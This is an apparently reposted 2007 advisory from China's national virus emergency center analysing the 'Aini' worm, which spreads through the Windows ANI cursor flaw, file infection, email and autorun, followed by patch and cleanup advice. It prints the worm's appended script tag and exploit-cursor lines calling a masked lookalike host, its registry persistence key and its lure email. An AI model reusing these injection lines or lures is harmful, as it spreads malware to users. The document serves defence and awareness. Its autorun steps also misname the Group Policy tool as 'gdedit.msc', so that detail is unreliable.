科技行者

行者学院 转型私董会 科技行者专题报道 网红大战科技行者

知识库

知识库 安全导航

至顶网网络频道蠕虫“艾妮”情况分析和解决方案

蠕虫“艾妮”情况分析和解决方案

  • 扫一扫
    分享文章到微信

  • 扫一扫
    关注官方公众号
    至顶头条

国家计算机病毒应急处理中心通过对互联网的监测发现“艾妮”复合型病毒。该病毒通过微软Windows系统ANI(动态光标)文件处理的漏洞、感染正常的可执行文件和本地网页文件、发送电子邮件、和感染优盘及及移动存储介质等途径进行传播,病毒自我传播能力很强。

作者:国家计算机病毒应急处理中心 2007年4月9日

关键字: 防病毒

  • 评论
  • 分享微博
  • 分享邮件

国家计算机病毒应急处理中心通过对互联网的监测发现“艾妮”复合型病毒。该病毒通过微软Windows系统ANI(动态光标)文件处理的漏洞、感染正常的可执行文件和本地网页文件、发送电子邮件、和感染优盘及及移动存储介质等途径进行传播,病毒自我传播能力很强。并且感染该病毒后,会自动下载运行木马程序,造成较大危害。

该蠕虫先后出现很多变种,在出现后的短时期内迅速传播,遭受感染的用户难于彻底清除,给其工作带来诸多不便。
蠕虫情况分析如下:
病毒名称:Worm_MyInfect.af
中文名:“艾妮”
其他名称:I-Worm/AniLoad(江民)
           Worm.MyInfect (金山)
           Worm.DlOnlineGames (瑞星)
病毒类型:复合型
感染系统:Windows 9X/ Windows ME/ Windows NT/ Windows 2000/
           Windows XP/ Windows 2003/ Windows Vista

病毒特性:

1、生成病毒文件
病毒运行后,复制自身到下面目录:
%SysDir%\sysload3.exe

2、 修改注册表项

HKCU\Software\Microsoft\Windows\CurrentVersion\Run
"System Boot Check"="%SysDir%\sysload3.exe"这样,病毒就可以随Windows系统启动自动运行。

 3、感染系统中文件

它能感染本地磁盘和网络共享目录中的可执行文件和脚本文件。
1) 感染可执行文件
将被感染文件和病毒融合成一个文件(被感染文件贴在病毒文件尾部)完成感染。
2) 脚本类文件
在这些脚本文件尾加上如下注示 <script src=http:// ****.microfsot.com/Noindex.js></script>
下载该脚本文件,里面含有如下代码:
<DIV style="CURSOR: url('http://****.microfsot.com/*.jpg')">
<DIV style="CURSOR: url('http://****.microfsot.com/*.jpg')">
以上两个图片链接利用了ANI漏洞,图片文件中含有溢出攻击代码,因此打开上面的Noindex.js网页时便会中毒。

4、下载指定网址文件

从指定网址下载木马程序和病毒升级程序。

5、通过电子邮件传播

病毒邮件特征如下:
发件人: i_love_cq@sohu.com
主题:你和谁视频的时候被拍下的?给你笑死了!
正文:
看你那小样!我看你是出名了!
你看这个地址!你的脸拍的那么清楚!你变明星了!
http://****.microfsot.com/***/134952.htm
如果用户点击了以上带有病毒的网页,就会遭受感染。

6、其它
遍历a-z的所有驱动器,如果该驱动器为“可移动存储”就在该驱动器上创建AUTORUN.INF,来达到传播自己的目的。检测软驱,若存在则复制病毒文件到其中文件名为tool.exe,并生成autorun.inf文件,使病毒可以自动运
行,以传播自身。修改hosts文件,屏蔽多个网址。这些网址大多是以前用来传播其他病毒的站点。

解决方法:

1、对没有遭受感染的计算机用户,应该尽快安装微软公司最新操作系统补丁(KB925902),并及时升级系统中的防病毒软件,同时打开防病毒软件的“实时监控”功能。

2、对已经感染变种的计算机用户,建议尽快下载专杀工具进行查杀修复工作。并安装微软公司最新操作系统补丁(KB925902)。

专杀工具下载链接地址:

http://download.jiangmin.info/jmsoft/ANIWormKiller.exe (江民公司)

微软公司相关补丁下载地址:

http://www.microsoft.com/technet/security/bulletin/ms07-017.mspx


安全建议:

1、局域网的计算机用户尽量避免创建可写的共享目录,已经创建共享目录的应立即停止共享。

2、如无必要,Windows 2000/XP用户应尽量关闭IPC$共享,并给具有管理员权限的帐号设置复杂的密码。

3、及时安装微软的安全更新,不要随意访问来源不明的网站。

4、计算机系统安装防病毒软件,并及时升级病毒定义库。

5、计算机用户使用U盘等移动设备交换文件时,务必开启杀毒软件的“实时监控”功能,或先用防病毒软件扫描,并关闭自动播放功能。

6、用户应慎用操作系统默认提供的“自动播放”功能,防止在使用移动存储介质过程中受到感染。用户可以在超级用户权限下按如下方法关闭该功能:

Windows XP用户
“开始”->“运行”->
输入“gdedit.msc”确定后打开“组策略”;依次打开:“计算机配置”->“管理模板”->单击“
系统”项;在右边设置中有一项“关闭自动播放”,双击打开其属性;选择“己启用”在属性框中选中所有驱动器,点击“确定”;同理再打开: “用户配制”->“管理模板”->单击“系统”项;在右边设置中有一项“关闭自动播放”,双击打开属性;选择“己启用”在属性框中选中所有驱动器,点击“确定”; 即可关闭自动播放。

注:Windows 2000用户打开“组策略”方法是,“开始”->“运行”->输入“mmc”->单击确定,打开控制台选择“控制台”菜单中“添加/删除管理单元”,单击“添加”,选择“组策略”->添加

    • 评论
    • 分享微博
    • 分享邮件
    邮件订阅

    如果您非常迫切的想了解IT领域最新产品与技术信息,那么订阅至顶网技术邮件将是您的最佳途径之一。

    重磅专题
    往期文章
    最新文章